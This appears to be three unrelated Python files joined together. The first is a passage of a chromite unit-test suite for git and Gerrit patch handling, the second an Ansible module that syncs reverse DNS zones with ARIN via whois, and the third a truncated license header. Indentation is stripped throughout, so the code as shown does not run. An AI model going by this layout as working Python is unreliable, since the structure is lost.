# Create an empty repo to work from.
self.source = os.path.join(self.tempdir, 'source.git')
self._CreateSourceRepo(self.source)
self.default_cwd = os.path.join(self.tempdir, 'unwritable')
self.original_cwd = os.getcwd()
os.mkdir(self.default_cwd)
os.chdir(self.default_cwd)
# Disallow write so as to smoke out any invalid writes to
# cwd.
os.chmod(self.default_cwd, 0o500)
def tearDown(self):
if hasattr(self, 'original_cwd'):
os.chdir(self.original_cwd)
def _MkPatch(self, source, sha1, ref='refs/heads/master', **kwargs):
return self.patch_kls(source, 'chromiumos/chromite', ref,
'%s/master' % constants.EXTERNAL_REMOTE,
kwargs.pop('remote', constants.EXTERNAL_REMOTE),
sha1=sha1, **kwargs)
def _run(self, cmd, cwd=None):
# Note that cwd is intentionally set to a location the user can't write
# to; this flushes out any bad usage in the tests that would work by
# fluke of being invoked from w/in a git repo.
if cwd is None:
cwd = self.default_cwd
return cros_build_lib.RunCommand(
cmd, cwd=cwd, print_cmd=False, capture_output=True).output.strip()
def _GetSha1(self, cwd, refspec):
return self._run(['git', 'rev-list', '-n1', refspec], cwd=cwd)
def _MakeRepo(self, name, clone, remote=None, alternates=True):
path = os.path.join(self.tempdir, name)
cmd = ['git', 'clone', clone, path]
if alternates:
cmd += ['--reference', clone]
if remote is None:
remote = constants.EXTERNAL_REMOTE
cmd += ['--origin', remote]
self._run(cmd)
return path
def _MakeCommit(self, repo, commit=None):
if commit is None:
commit = "commit at %s" % (time.time(),)
self._run(['git', 'commit', '-a', '-m', commit], repo)
return self._GetSha1(repo, 'HEAD')
def CommitFile(self, repo, filename, content, commit=None, **kwargs):
osutils.WriteFile(os.path.join(repo, filename), content)
self._run(['git', 'add', filename], repo)
sha1 = self._MakeCommit(repo, commit=commit)
if not self.has_native_change_id:
kwargs.pop('ChangeId', None)
patch = self._MkPatch(repo, sha1, **kwargs)
self.assertEqual(patch.sha1, sha1)
return patch
def _CommonGitSetup(self):
git1 = self._MakeRepo('git1', self.source)
git2 = self._MakeRepo('git2', self.source)
patch = self.CommitFile(git1, 'monkeys', 'foon')
return git1, git2, patch
def MakeChangeId(self, how_many=1):
l = [cros_patch.MakeChangeId() for _ in xrange(how_many)]
if how_many == 1:
return l[0]
return l
def CommitChangeIdFile(self, repo, changeid=None, extra=None,
filename='monkeys', content='flinging',
raw_changeid_text=None, **kwargs):
template = self.COMMIT_TEMPLATE
if changeid is None:
changeid = self.MakeChangeId()
if raw_changeid_text is None:
raw_changeid_text = 'Change-Id: %s' % (changeid,)
if extra is None:
extra = ''
commit = template % {'change-id': raw_changeid_text, 'extra':extra}
return self.CommitFile(repo, filename, content, commit=commit,
ChangeId=changeid, **kwargs)
class TestGitRepoPatch(GitRepoPatchTestCase):
"""Unittests for git patch related methods."""
def testGetDiffStatus(self):
git1, _, patch1 = self._CommonGitSetup()
# Ensure that it can work on the first commit, even if it
# doesn't report anything (no delta; it's the first files).
patch1 = self._MkPatch(git1, self._GetSha1(git1, self.DEFAULT_TRACKING))
self.assertEqual({}, patch1.GetDiffStatus(git1))
patch2 = self.CommitFile(git1, 'monkeys', 'blah')
self.assertEqual({'monkeys': 'M'}, patch2.GetDiffStatus(git1))
git.RunGit(git1, ['mv', 'monkeys', 'monkeys2'])
patch3 = self._MkPatch(git1, self._MakeCommit(git1, commit="mv"))
self.assertEqual({'monkeys': 'D', 'monkeys2': 'A'},
patch3.GetDiffStatus(git1))
patch4 = self.CommitFile(git1, 'monkey2', 'blah')
self.assertEqual({'monkey2': 'A'}, patch4.GetDiffStatus(git1))
def testFetch(self):
_, git2, patch = self._CommonGitSetup()
patch.Fetch(git2)
self.assertEqual(patch.sha1, self._GetSha1(git2, 'FETCH_HEAD'))
# Verify reuse; specifically that Fetch doesn't actually run since
# the rev is already available locally via alternates.
patch.project_url = '/dev/null'
git3 = self._MakeRepo('git3', git2)
patch.Fetch(git3)
self.assertEqual(patch.sha1, self._GetSha1(git3, patch.sha1))
def testFetchFirstPatchInSeries(self):
git1, git2, patch = self._CommonGitSetup()
self.CommitFile(git1, 'monkeys', 'foon2')
patch.Fetch(git2)
def testFetchWithoutSha1(self):
git1, git2, _ = self._CommonGitSetup()
patch2 = self.CommitFile(git1, 'monkeys', 'foon2')
sha1, patch2.sha1 = patch2.sha1, None
patch2.Fetch(git2)
self.assertEqual(sha1, patch2.sha1)
def testAlreadyApplied(self):
git1 = self._MakeRepo('git1', self.source)
patch1 = self._MkPatch(git1, self._GetSha1(git1, 'HEAD'))
self.assertRaises2(cros_patch.PatchAlreadyApplied, patch1.Apply, git1,
self.DEFAULT_TRACKING, check_attrs={'inflight':False})
patch2 = self.CommitFile(git1, 'monkeys', 'rule')
self.assertRaises2(cros_patch.PatchAlreadyApplied, patch2.Apply, git1,
self.DEFAULT_TRACKING, check_attrs={'inflight':True})
def testDeleteEbuildTwice(self):
"""Test that double-deletes of ebuilds are flagged as conflicts."""
# Create monkeys.ebuild for testing.
git1 = self._MakeRepo('git1', self.source)
patch1 = self.CommitFile(git1, 'monkeys.ebuild', 'rule')
git.RunGit(git1, ['rm', 'monkeys.ebuild'])
patch2 = self._MkPatch(git1, self._MakeCommit(git1, commit='rm'))
# Delete an ebuild that does not exist in TOT.
check_attrs = {'inflight': False, 'files': ('monkeys.ebuild',)}
self.assertRaises2(cros_patch.EbuildConflict, patch2.Apply, git1,
self.DEFAULT_TRACKING, check_attrs=check_attrs)
# Delete an ebuild that exists in TOT, but does not exist in the current
# patch series.
check_attrs['inflight'] = True
self.assertRaises2(cros_patch.EbuildConflict, patch2.Apply, git1,
patch1.sha1, check_attrs=check_attrs)
def testCleanlyApply(self):
_, git2, patch = self._CommonGitSetup()
# Clone git3 before we modify git2; else we'll just wind up
# cloning it's master.
git3 = self._MakeRepo('git3', git2)
patch.Apply(git2, self.DEFAULT_TRACKING)
self.assertEqual(patch.sha1, self._GetSha1(git2, 'HEAD'))
# Verify reuse; specifically that Fetch doesn't actually run since
# the object is available in alternates. testFetch partially
# validates this; the Apply usage here fully validates it via
# ensuring that the attempted Apply goes boom if it can't get the
# required sha1.
patch.project_url = '/dev/null'
patch.Apply(git3, self.DEFAULT_TRACKING)
self.assertEqual(patch.sha1, self._GetSha1(git3, 'HEAD'))
def testFailsApply(self):
_, git2, patch1 = self._CommonGitSetup()
patch2 = self.CommitFile(git2, 'monkeys', 'not foon')
# Note that Apply creates it's own branch, resetting to master
# thus we have to re-apply (even if it looks stupid, it's right).
patch2.Apply(git2, self.DEFAULT_TRACKING)
self.assertRaises2(cros_patch.ApplyPatchException,
patch1.Apply, git2, self.DEFAULT_TRACKING,
exact_kls=True, check_attrs={'inflight':True})
def testTrivial(self):
_, git2, patch1 = self._CommonGitSetup()
# Throw in a bunch of newlines so that content-merging would work.
content = 'not foon%s' % ('\n' * 100)
patch1 = self._MkPatch(git2, self._GetSha1(git2, 'HEAD'))
patch1 = self.CommitFile(git2, 'monkeys', content)
git.RunGit(
git2, ['update-ref', self.DEFAULT_TRACKING, patch1.sha1])
patch2 = self.CommitFile(git2, 'monkeys', '%sblah' % content)
patch3 = self.CommitFile(git2, 'monkeys', '%sblahblah' % content)
# Get us a back to the basic, then derive from there; this is used to
# verify that even if content merging works, trivial is flagged.
self.CommitFile(git2, 'monkeys', 'foon')
patch4 = self.CommitFile(git2, 'monkeys', content)
patch5 = self.CommitFile(git2, 'monkeys', '%sfoon' % content)
# Reset so we derive the next changes from patch1.
git.RunGit(git2, ['reset', '--hard', patch1.sha1])
patch6 = self.CommitFile(git2, 'blah', 'some-other-file')
self.CommitFile(git2, 'monkeys',
'%sblah' % content.replace('not', 'bot'))
self.assertRaises2(cros_patch.PatchAlreadyApplied,
patch1.Apply, git2, self.DEFAULT_TRACKING, trivial=True,
check_attrs={'inflight':False, 'trivial':False})
# Now test conflicts since we're still at ToT; note that this is an actual
# conflict because the fuzz anchors have changed.
self.assertRaises2(cros_patch.ApplyPatchException,
patch3.Apply, git2, self.DEFAULT_TRACKING, trivial=True,
check_attrs={'inflight':False, 'trivial':False},
exact_kls=True)
# Now test trivial conflict; this would've merged fine were it not for
# trivial.
self.assertRaises2(cros_patch.PatchAlreadyApplied,
patch4.Apply, git2, self.DEFAULT_TRACKING, trivial=True,
check_attrs={'inflight':False, 'trivial':False},
exact_kls=True)
# Move us into inflight testing.
patch2.Apply(git2, self.DEFAULT_TRACKING, trivial=True)
# Repeat the tests from above; should still be the same.
self.assertRaises2(cros_patch.PatchAlreadyApplied,
patch4.Apply, git2, self.DEFAULT_TRACKING, trivial=True,
check_attrs={'inflight':False, 'trivial':False})
# Actual conflict merge conflict due to inflight; non trivial induced.
self.assertRaises2(cros_patch.ApplyPatchException,
patch5.Apply, git2, self.DEFAULT_TRACKING, trivial=True,
check_attrs={'inflight':True, 'trivial':False},
exact_kls=True)
self.assertRaises2(cros_patch.PatchAlreadyApplied,
patch1.Apply, git2, self.DEFAULT_TRACKING, trivial=True,
check_attrs={'inflight':False})
self.assertRaises2(cros_patch.ApplyPatchException,
patch5.Apply, git2, self.DEFAULT_TRACKING, trivial=True,
check_attrs={'inflight':True, 'trivial':False},
exact_kls=True)
# And this should apply without issue, despite the differing history.
patch6.Apply(git2, self.DEFAULT_TRACKING, trivial=True)
def _assertLookupAliases(self, remote):
git1 = self._MakeRepo('git1', self.source)
patch = self.CommitChangeIdFile(git1, remote=remote)
prefix = '*' if patch.internal else ''
vals = [patch.sha1, getattr(patch, 'gerrit_number', None),
getattr(patch, 'original_sha1', None)]
# Append full Change-ID if it exists.
if patch.project and patch.tracking_branch and patch.change_id:
vals.append('%s~%s~%s' % (
patch.project, patch.tracking_branch, patch.change_id))
vals = [x for x in vals if x is not None]
self.assertEqual(set(prefix + x for x in vals), set(patch.LookupAliases()))
def testExternalLookupAliases(self):
self._assertLookupAliases(constants.EXTERNAL_REMOTE)
def testInternalLookupAliases(self):
self._assertLookupAliases(constants.INTERNAL_REMOTE)
def _CheckPaladin(self, repo, master_id, ids, extra):
patch = self.CommitChangeIdFile(
repo, master_id, extra=extra,
filename='paladincheck', content=str(_GetNumber()))
deps = patch.PaladinDependencies(repo)
# Assert that our parsing unique'ifies the results.
self.assertEqual(len(deps), len(set(deps)))
# Verify that we have the correct dependencies.
dep_ids = []
dep_ids += [(dep.remote, dep.change_id) for dep in deps
if dep.change_id is not None]
dep_ids += [(dep.remote, dep.gerrit_number) for dep in deps
if dep.gerrit_number is not None]
dep_ids += [(dep.remote, dep.sha1) for dep in deps
if dep.sha1 is not None]
for input_id in ids:
change_tuple = cros_patch.StripPrefix(input_id)
self.assertTrue(change_tuple in dep_ids)
return patch
def testPaladinDependencies(self):
git1 = self._MakeRepo('git1', self.source)
cid1, cid2, cid3, cid4 = self.MakeChangeId(4)
# Verify it handles nonexistant CQ-DEPEND.
self._CheckPaladin(git1, cid1, [], '')
# Single key, single value.
self._CheckPaladin(git1, cid1, [cid2],
'CQ-DEPEND=%s' % cid2)
# Single key, gerrit number.
self._CheckPaladin(git1, cid1, ['123'],
'CQ-DEPEND=%s' % 123)
# Single key, gerrit number.
self._CheckPaladin(git1, cid1, ['123456'],
'CQ-DEPEND=%s' % 123456)
# Single key, gerrit number; ensure it
# cuts off before a million changes (this
# is done to avoid collisions w/ sha1 when
# we're using shortened versions).
self.assertRaises(cros_patch.BrokenCQDepends,
self._CheckPaladin, git1, cid1,
['1234567'], 'CQ-DEPEND=%s' % '1234567')
# Single key, gerrit number, internal.
self._CheckPaladin(git1, cid1, ['*123'],
'CQ-DEPEND=%s' % '*123')
# Ensure SHA1's aren't allowed.
sha1 = '0' * 40
self.assertRaises(cros_patch.BrokenCQDepends,
self._CheckPaladin, git1, cid1,
[sha1], 'CQ-DEPEND=%s' % sha1)
# Single key, multiple values
self._CheckPaladin(git1, cid1, [cid2, '1223'],
'CQ-DEPEND=%s %s' % (cid2, '1223'))
# Dumb comma behaviour
self._CheckPaladin(git1, cid1, [cid2, cid3],
'CQ-DEPEND=%s, %s,' % (cid2, cid3))
# Multiple keys.
self._CheckPaladin(git1, cid1, [cid2, '*245', cid4],
'CQ-DEPEND=%s, %s\nCQ-DEPEND=%s' % (cid2, '*245', cid4))
# Ensure it goes boom on invalid data.
self.assertRaises(cros_patch.BrokenCQDepends, self._CheckPaladin,
git1, cid1, [], 'CQ-DEPEND=monkeys')
self.assertRaises(cros_patch.BrokenCQDepends, self._CheckPaladin,
git1, cid1, [], 'CQ-DEPEND=%s monkeys' % (cid2,))
# Validate numeric is allowed.
self._CheckPaladin(git1, cid1, [cid2, '1'], 'CQ-DEPEND=1 %s' % cid2)
# Validate that it unique'ifies the results.
self._CheckPaladin(git1, cid1, ['1'], 'CQ-DEPEND=1 1')
# Invalid syntax
self.assertRaises(cros_patch.BrokenCQDepends, self._CheckPaladin,
git1, cid1, [], 'CQ-DEPENDS=1')
self.assertRaises(cros_patch.BrokenCQDepends, self._CheckPaladin,
git1, cid1, [], 'CQ_DEPEND=1')
class TestApplyAgainstManifest(GitRepoPatchTestCase,
cros_test_lib.MockTestCase):
"""Test applying a patch against a manifest"""
MANIFEST_TEMPLATE = (
"""<?xml version="1.0" encoding="UTF-8"?>
<manifest>
<remote name="cros" />
<default revision="refs/heads/master" remote="cros" />
%(projects)s
</manifest>
"""
)
def _CommonRepoSetup(self, *projects):
basedir = self.tempdir
repodir = os.path.join(basedir, '.repo')
manifest_file = os.path.join(repodir, 'manifest.xml')
proj_pieces = []
for project in projects:
proj_pieces.append('<project')
for key, val in project.items():
if key == 'path':
val = os.path.relpath(os.path.realpath(val),
os.path.realpath(self.tempdir))
proj_pieces.append(' %s="%s"' % (key, val))
proj_pieces.append(' />\n ')
proj_str = ''.join(proj_pieces)
content = self.MANIFEST_TEMPLATE % {'projects': proj_str}
os.mkdir(repodir)
osutils.WriteFile(manifest_file, content)
return basedir
def testApplyAgainstManifest(self):
git1, git2, _ = self._CommonGitSetup()
readme_text = "Dummy README text."
readme1 = self.CommitFile(git1, "README", readme_text)
readme_text += " Even more dummy README text."
readme2 = self.CommitFile(git1, "README", readme_text)
readme_text += " Even more README text."
readme3 = self.CommitFile(git1, "README", readme_text)
git1_proj = {'path': git1,
'name': 'chromiumos/chromite',
'revision': str(readme1.sha1),
'upstream': 'refs/heads/master'
}
git2_proj = {'path': git2,
'name': 'git2'
}
basedir = self._CommonRepoSetup(git1_proj, git2_proj)
# pylint: disable=E1101
self.PatchObject(git.ManifestCheckout, '_GetManifestsBranch',
return_value=None)
manifest = git.ManifestCheckout(basedir)
readme2.ApplyAgainstManifest(manifest)
readme3.ApplyAgainstManifest(manifest)
# Verify that both readme2 and readme3 are on the patch branch.
shas = self._run(['git', 'log', '--format=%H',
'%s..%s' % (readme1.sha1, constants.PATCH_BRANCH)],
git1).splitlines()
self.assertEqual(shas, [str(readme3.sha1), str(readme2.sha1)])
class TestLocalPatchGit(GitRepoPatchTestCase):
"""Test Local patch handling."""
patch_kls = cros_patch.LocalPatch
def setUp(self):
self.sourceroot = os.path.join(self.tempdir, 'sourceroot')
def _MkPatch(self, source, sha1, ref='refs/heads/master', **kwargs):
remote = kwargs.pop('remote', constants.EXTERNAL_REMOTE)
return self.patch_kls(source, 'chromiumos/chromite', ref,
'%s/master' % remote, remote, sha1, **kwargs)
def testUpload(self):
def ProjectDirMock(_sourceroot):
return git1
git1, git2, patch = self._CommonGitSetup()
git2_sha1 = self._GetSha1(git2, 'HEAD')
patch.ProjectDir = ProjectDirMock
# First suppress carbon copy behaviour so we verify pushing
# plain works.
# pylint: disable=E1101
sha1 = patch.sha1
patch._GetCarbonCopy = lambda: sha1
patch.Upload(git2, 'refs/testing/test1')
self.assertEqual(self._GetSha1(git2, 'refs/testing/test1'),
patch.sha1)
# Enable CarbonCopy behaviour; verify it lands a different
# sha1. Additionally verify it didn't corrupt the patch's sha1 locally.
del patch._GetCarbonCopy
patch.Upload(git2, 'refs/testing/test2')
self.assertNotEqual(self._GetSha1(git2, 'refs/testing/test2'),
patch.sha1)
self.assertEqual(patch.sha1, sha1)
# Ensure the carbon creation didn't damage the target repo.
self.assertEqual(self._GetSha1(git1, 'HEAD'), sha1)
# Ensure we didn't damage the target repo's state at all.
self.assertEqual(git2_sha1, self._GetSha1(git2, 'HEAD'))
# Ensure the content is the same.
base = ['git', 'show']
self.assertEqual(
self._run(base + ['refs/testing/test1:monkeys'], git2),
self._run(base + ['refs/testing/test2:monkeys'], git2))
base = ['git', 'log', '--format=%B', '-n1']
self.assertEqual(
self._run(base + ['refs/testing/test1'], git2),
self._run(base + ['refs/testing/test2'], git2))
class TestUploadedLocalPatch(GitRepoPatchTestCase):
"""Test uploading of local git patches."""
PROJECT = 'chromiumos/chromite'
ORIGINAL_BRANCH = 'original_branch'
ORIGINAL_SHA1 = 'ffffffff'.ljust(40, '0')
patch_kls = cros_patch.UploadedLocalPatch
def _MkPatch(self, source, sha1, ref='refs/heads/master', **kwargs):
return self.patch_kls(source, self.PROJECT, ref,
'%s/master' % constants.EXTERNAL_REMOTE,
self.ORIGINAL_BRANCH,
self.ORIGINAL_SHA1,
kwargs.pop('remote', constants.EXTERNAL_REMOTE),
carbon_copy_sha1=sha1, **kwargs)
def testStringRepresentation(self):
_, _, patch = self._CommonGitSetup()
str_rep = str(patch).split(':')
for element in [self.PROJECT, self.ORIGINAL_BRANCH, self.ORIGINAL_SHA1[:8]]:
self.assertTrue(element in str_rep,
msg="Couldn't find %s in %s" % (element, str_rep))
class TestGerritPatch(GitRepoPatchTestCase):
"""Test Gerrit patch handling."""
has_native_change_id = True
class patch_kls(cros_patch.GerritPatch):
"""Test helper class to suppress pointing to actual gerrit."""
# Suppress the behaviour pointing the project url at actual gerrit,
# instead slaving it back to a local repo for tests.
def __init__(self, *args, **kwargs):
cros_patch.GerritPatch.__init__(self, *args, **kwargs)
assert hasattr(self, 'patch_dict')
self.project_url = self.patch_dict['_unittest_url_bypass']
@property
def test_json(self):
return copy.deepcopy(FAKE_PATCH_JSON)
def _MkPatch(self, source, sha1, ref='refs/heads/master', **kwargs):
json = self.test_json
remote = kwargs.pop('remote', constants.EXTERNAL_REMOTE)
url_prefix = kwargs.pop('url_prefix', constants.EXTERNAL_GERRIT_URL)
suppress_branch = kwargs.pop('suppress_branch', False)
change_id = kwargs.pop('ChangeId', None)
if change_id is None:
change_id = self.MakeChangeId()
json.update(kwargs)
change_num, patch_num = _GetNumber(), _GetNumber()
# Note we intentionally use a gerrit like refspec here; we want to
# ensure that none of our common code pathways puke on a non head/tag.
refspec = gerrit.GetChangeRef(change_num + 1000, patch_num)
json['currentPatchSet'].update(
dict(number=patch_num, ref=refspec, revision=sha1))
json['branch'] = os.path.basename(ref)
json['_unittest_url_bypass'] = source
json['id'] = change_id
obj = self.patch_kls(json.copy(), remote, url_prefix)
self.assertEqual(obj.patch_dict, json)
self.assertEqual(obj.remote, remote)
self.assertEqual(obj.url_prefix, url_prefix)
self.assertEqual(obj.project, json['project'])
self.assertEqual(obj.ref, refspec)
self.assertEqual(obj.change_id, change_id)
self.assertEqual(obj.id, '%s%s~%s~%s' % (
constants.CHANGE_PREFIX[remote], json['project'],
json['branch'], change_id))
# Now make the fetching actually work, if desired.
if not suppress_branch:
# Note that a push is needed here, rather than a branch; branch
# will just make it under refs/heads, we want it literally in
# refs/changes/
self._run(['git', 'push', source, '%s:%s' % (sha1, refspec)], source)
return obj
def testApprovalTimestamp(self):
"""Test that the approval timestamp is correctly extracted from JSON."""
repo = self._MakeRepo('git', self.source)
for approvals, expected in [(None, 0), ([], 0), ([1], 1), ([1, 3, 2], 3)]:
currentPatchSet = copy.deepcopy(FAKE_PATCH_JSON['currentPatchSet'])
if approvals is not None:
currentPatchSet['approvals'] = [{'grantedOn': x} for x in approvals]
patch = self._MkPatch(repo, self._GetSha1(repo, self.DEFAULT_TRACKING),
currentPatchSet=currentPatchSet)
msg = 'Expected %r, but got %r (approvals=%r)' % (
expected, patch.approval_timestamp, approvals)
self.assertEqual(patch.approval_timestamp, expected, msg)
def _assertGerritDependencies(self, remote=constants.EXTERNAL_REMOTE):
convert = str
if remote == constants.INTERNAL_REMOTE:
convert = lambda val: '*%s' % (val,)
git1 = self._MakeRepo('git1', self.source, remote=remote)
patch = self._MkPatch(git1, self._GetSha1(git1, 'HEAD'), remote=remote)
cid1, cid2 = '1', '2'
# Test cases with no dependencies, 1 dependency, and 2 dependencies.
self.assertEqual(patch.GerritDependencies(), [])
patch.patch_dict['dependsOn'] = [{'number': cid1}]
self.assertEqual(
[cros_patch.AddPrefix(x, x.gerrit_number)
for x in patch.GerritDependencies()],
[convert(cid1)])
patch.patch_dict['dependsOn'].append({'number': cid2})
self.assertEqual(
[cros_patch.AddPrefix(x, x.gerrit_number)
for x in patch.GerritDependencies()],
[convert(cid1), convert(cid2)])
def testExternalGerritDependencies(self):
self._assertGerritDependencies()
def testInternalGerritDependencies(self):
self._assertGerritDependencies(constants.INTERNAL_REMOTE)
class PrepareRemotePatchesTest(cros_test_lib.TestCase):
"""Test preparing remote patches."""
def MkRemote(self,
project='my/project', original_branch='my-local',
ref='refs/tryjobs/elmer/patches', tracking_branch='master',
internal=False):
l = [project, original_branch, ref, tracking_branch,
getattr(constants, '%s_PATCH_TAG' % (
'INTERNAL' if internal else 'EXTERNAL'))]
return ':'.join(l)
def assertRemote(self, patch, project='my/project',
original_branch='my-local',
ref='refs/tryjobs/elmer/patches', tracking_branch='master',
internal=False):
self.assertEqual(patch.project, project)
self.assertEqual(patch.original_branch, original_branch)
self.assertEqual(patch.ref, ref)
self.assertEqual(patch.tracking_branch, tracking_branch)
self.assertEqual(patch.internal, internal)
def test(self):
# Check handling of a single patch...
patches = cros_patch.PrepareRemotePatches([self.MkRemote()])
self.assertEqual(len(patches), 1)
self.assertRemote(patches[0])
# Check handling of a multiple...
patches = cros_patch.PrepareRemotePatches(
[self.MkRemote(), self.MkRemote(project='foon')])
self.assertEqual(len(patches), 2)
self.assertRemote(patches[0])
self.assertRemote(patches[1], project='foon')
# Ensure basic validation occurs:
chunks = self.MkRemote().split(':')
self.assertRaises(ValueError, cros_patch.PrepareRemotePatches,
':'.join(chunks[:-1]))
self.assertRaises(ValueError, cros_patch.PrepareRemotePatches,
':'.join(chunks[:-1] + ['monkeys']))
self.assertRaises(ValueError, cros_patch.PrepareRemotePatches,
':'.join(chunks + [':']))
class PrepareLocalPatchesTests(cros_build_lib_unittest.RunCommandTestCase):
"""Test preparing local patches."""
def setUp(self):
self.path, self.project, self.branch = 'mydir', 'my/project', 'mybranch'
self.tracking_branch = 'kernel'
self.patches = ['%s:%s' % (self.project, self.branch)]
self.manifest = mock.MagicMock()
attrs = dict(tracking_branch=self.tracking_branch,
local_path=self.path,
remote='cros')
checkout = git.ProjectCheckout(attrs)
self.PatchObject(
self.manifest, 'FindCheckouts', return_value=[checkout]
)
def PrepareLocalPatches(self, output):
"""Check the returned GitRepoPatchInfo against golden values."""
output_obj = mock.MagicMock()
output_obj.output = output
self.PatchObject(cros_patch.LocalPatch, 'Fetch', return_value=output_obj)
self.PatchObject(git, 'RunGit', return_value=output_obj)
patch_info, = cros_patch.PrepareLocalPatches(self.manifest, self.patches)
self.assertEquals(patch_info.project, self.project)
self.assertEquals(patch_info.ref, self.branch)
self.assertEquals(patch_info.tracking_branch, self.tracking_branch)
def testBranchSpecifiedSuccessRun(self):
"""Test success with branch specified by user."""
self.PrepareLocalPatches('12345'.rjust(40, '0'))
def testBranchSpecifiedNoChanges(self):
"""Test when no changes on the branch specified by user."""
self.assertRaises(SystemExit, self.PrepareLocalPatches, '')
class TestFormatting(cros_test_lib.TestCase):
"""Test formatting of output."""
def _assertResult(self, functor, value, expected=None, raises=False,
**kwargs):
if raises:
self.assertRaises2(ValueError, functor, value,
msg="%s(%r) did not throw a ValueError"
% (functor.__name__, value), **kwargs)
else:
self.assertEqual(functor(value, **kwargs), expected,
msg="failed: %s(%r) != %r"
% (functor.__name__, value, expected))
def _assertBad(self, functor, values, **kwargs):
for value in values:
self._assertResult(functor, value, raises=True, **kwargs)
def _assertGood(self, functor, values, **kwargs):
for value, expected in values:
self._assertResult(functor, value, expected, **kwargs)
def TestGerritNumber(self):
"""Tests that we can pasre a Gerrit number."""
self._assertGood(cros_patch.ParseGerritNumber,
[('12345',) * 2, ('12',) * 2, ('123',) * 2])
self._assertBad(
cros_patch.ParseGerritNumber,
['is', 'i1325', '01234567', '012345a', '**12345', '+123', '/0123'],
error_ok=False)
def TestChangeID(self):
"""Tests that we can parse a change-ID."""
self._assertGood(cros_patch.ParseChangeID,
[('I47ea30385af60ae4cc2acc5d1a283a46423bc6e1',) * 2])
# Change-IDs too short/long, with unexpected characters in it.
self._assertBad(
cros_patch.ParseChangeID,
['is', '**i1325', 'i134'.ljust(41, '0'), 'I1234+'.ljust(41, '0'),
'I123'.ljust(42, '0')],
error_ok=False)
def TestSHA1(self):
"""Tests that we can parse a SHA1 hash."""
self._assertGood(cros_patch.ParseSHA1,
[('1' * 40,) * 2,
('a' * 40,) * 2,
('1a7e034'.ljust(40, '0'),) *2])
self._assertBad(
cros_patch.ParseSHA1,
['0abcg', 'Z', '**a', '+123', '1234ab' * 10],
error_ok=False)
def TestFullChangeID(self):
"""Tests that we can parse a full change-ID."""
change_id = 'I47ea30385af60ae4cc2acc5d1a283a46423bc6e1'
self._assertGood(cros_patch.ParseFullChangeID,
[('foo~bar~%s' % change_id, ('foo', 'bar', change_id)),
('foo/bar/baz~refs/heads/_my-branch_~%s' % change_id,
('foo/bar/baz', '_my-branch_', change_id))])
self._assertBad(
cros_patch.ParseFullChangeID,
['foo', 'foo~bar', 'foo~bar~baz', 'foo~refs/bar~%s' % change_id],
error_ok=False)
def testParsePatchDeps(self):
"""Tests that we can parse the dependency specified by the user."""
change_id = 'I47ea30385af60ae4cc2acc5d1a283a46423bc6e1'
vals = ['CL:12345', 'project~branch~%s' % change_id, change_id,
change_id[1:]]
for val in vals:
self.assertTrue(cros_patch.ParsePatchDep(val) is not None)
self._assertBad(cros_patch.ParsePatchDep,
['1454623', 'I47ea3', 'i47ea3'.ljust(41, '0')])
if __name__ == '__main__':
cros_test_lib.main()
|
#!/usr/bin/env python3
import yaml
import jinja2
import ipwhois
import subprocess
from ansible.module_utils.basic import AnsibleModule
from ansible.errors import AnsibleError
DOCUMENTATION = """
---
module: dns_sync_arin.py
short_description: Synchronize reverse zones with ARIN
options:
irr:
required: true
description:
- IRR to target
contact:
required: true
description:
- Object to use as a contact
mntner:
required: true
description:
- Object to use as a maintainer
reverses:
required: true
description:
- reverse zones as provided by dns_sync
"""
RETURN = """
reverses:
description: a list of remaining reverse zones (not ones processed here)
type: dict
returned: always
records:
description: record to be sent for sync through GPG-email
type: str
returned: changed
"""
def run_module():
module_args = dict(
irr=dict(type='str', required=True),
contact=dict(type='str', required=True),
mntner=dict(type='str', required=True),
reverses=dict(type='dict', required=True),
)
result = dict(
changed=False,
)
module = AnsibleModule(
argument_spec=module_args,
supports_check_mode=True
)
wanted = {}
got = {}
data = module.params['reverses']
irr = module.params['irr']
for zone, details in data.items():
try:
whois = ipwhois.IPWhois(
address=details['net'].split("/")[0]).lookup_rdap(
asn_methods=['whois', 'http'])
except ipwhois.exceptions.IPDefinedError:
continue
if not whois['asn_registry'].upper().startswith(irr):
continue
# Then, update
template = jinja2.Template("""
domain: {{ zone }}
descr: Reverse zone for {{ net }}
{%- for ns in nss %}
nserver: {{ ns }}
{%- endfor %}
admin-c: {{ contact }}
tech-c: {{ contact }}
zone-c: {{ contact }}
mnt-by: {{ mntner }}
source: {{ irr }}
""".strip())
wanted[zone] = template.render(zone=zone,
irr=irr,
contact=module.params['contact'],
mntner=module.params['mntner'],
net=details["net"],
nss=details["ns"])
# Grab existing records
args = ["whois",
"-h", f"whois.{irr.lower()}.net",
"-s", irr,
"-BrG",
"-T", "domain",
zone]
proc = subprocess.run(args, capture_output=True)
if proc.returncode != 0:
raise AnsibleError(
f"unable to query whois: {args}")
out = [line.strip()
for line in proc.stdout.decode('ascii').split("\n")
if line.strip() and not line.startswith(("%",
"last-modified:",
"created:"))]
if out:
got[zone] = "\n".join(out)
if got != wanted:
result['changed'] = True
if module._diff:
result['diff'] = [
dict(before_header=k,
after_header=k,
before=got.get(k, ""),
after=wanted.get(k, ""))
for k in set((*wanted.keys(), *got.keys()))
if k not in wanted or k not in got or wanted[k] != got[k]]
result['records'] = "\n\n".join([wanted[zone]
for zone in wanted
if zone not in got
or got[zone] != wanted[zone]])
result['reverses'] = {k: v
for k, v in data.items()
if k not in wanted}
module.exit_json(**result)
def main():
run_module()
if __name__ == '__main__':
main()
|
<reponame>hiliev/py-zfs-recovery
# Copyright (c) 2017 <NAME> <<EMAIL>>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
